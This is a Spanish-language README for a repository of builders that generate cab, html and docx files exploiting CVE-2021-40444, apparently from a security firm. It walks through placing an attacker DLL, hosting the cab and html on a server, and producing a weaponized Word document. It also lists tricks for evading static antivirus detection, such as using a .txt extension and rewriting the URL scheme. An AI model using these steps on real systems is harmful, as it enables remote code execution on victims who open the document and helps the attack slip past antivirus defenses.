
Este repositorio contiene builders de archivos cab, html y docx para el exploit de CVE-2021-40444.
Este repositorio contiene builders del archivo cab, del archivo html y del archivo docx para el exploit CVE-2021-40444. Este repositorio es solo para pruebas, investigación y fines educativos. Eres responsable del uso que le des al código proporcionado en este repositorio.
El código fue desarrollado mediante ingeniería inversa de muestras de malware encontradas en la naturaleza y compartidas por diversos investigadores de seguridad.
Los builders para este CVE ya son públicos. El propósito de este repositorio es comprobar con qué eficacia podemos evadir las detecciones estáticas de diferentes proveedores de antivirus para los archivos docx, al momento de redactar esto.
El código JS se puede ofuscar fácilmente con herramientas en línea o manualmente. Pero el archivo docx contiene solo un archivo, que es document.xml.rels, en el cual se pueden basar las firmas. Qué podemos manipular en él para evadir las detecciones estáticas de la mayoría de los antivirus.
El cabrc.exe es un ejecutable de Microsoft incluido en Internet Explorer Administration Kit y se puede descargar desde https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads y después de la instalación encontrarás este ejecutable en "C:\Program Files (x86)\Windows IEAK 11"
Hay 3 builders.
El código funciona con python 2.7
Primero ve a la carpeta CVE-2021-40444 y coloca tu archivo dll allí y renómbralo a IEcache.inf (o puedes usar la dll de calc que ya está allí).
Luego ve a la carpeta source y genera el archivo cab
c:\cve-2021-40444\sources\python generate_cab.py
Sube tu archivo cab y, usando la URL del archivo cab, genera el archivo html
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Nota: en lugar de usar la extensión html, si usamos .txt el exploit sigue funcionando, pero evade el AV)
Ahora, por último, sube tu archivo html y genera el archivo doc. Usa HTTP (en mayúsculas) en lugar de http, y "" en lugar de "/", para evadir el AV. Y tampoco necesitamos x-usc:.
ejemplo: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
El resultado está frente a ti.


www.aslitsecurity.com
[email protected]